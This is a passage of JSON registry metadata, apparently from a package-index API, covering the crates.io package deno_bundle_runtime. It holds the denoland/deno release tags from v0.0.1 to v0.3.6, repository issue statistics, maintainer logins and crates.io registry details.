itories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T08:40:15.220Z","dependent_packages_count":0,"downloads":55288,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":93.9034716342083,"dependent_repos_count":20.036208255871674,"dependent_packages_count":26.516707384732186,"stargazers_count":0.029197932786358724,"forks_count":0.045743428031962005,"docker_downloads_count":null,"average":28.106265727126093},"purl":"pkg:cargo/deno_bundle_runtime","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_bundle_runtime","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_bundle_runtime","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_bundle_runtime/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-09-12T08:12:34.131Z","updated_at":"2025-09-12T08:12:34.131Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"96431","login":"littledivy","name":"Divy Srivastava","email":null,"url":"https://github.com/littledivy","packages_count":37,"html_url":"https://crates.io/users/littledivy","role":null,"created_at":"2025-09-12T08:12:34.239Z","updated_at":"2025-09-12T08:12:34.239Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/littledivy/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-09-12T08:12:34.542Z","updated_at":"2025-09-12T08:12:34.542Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5858420,"name":"pacup-rs","ecosystem":"cargo","description":"Help maintainers update 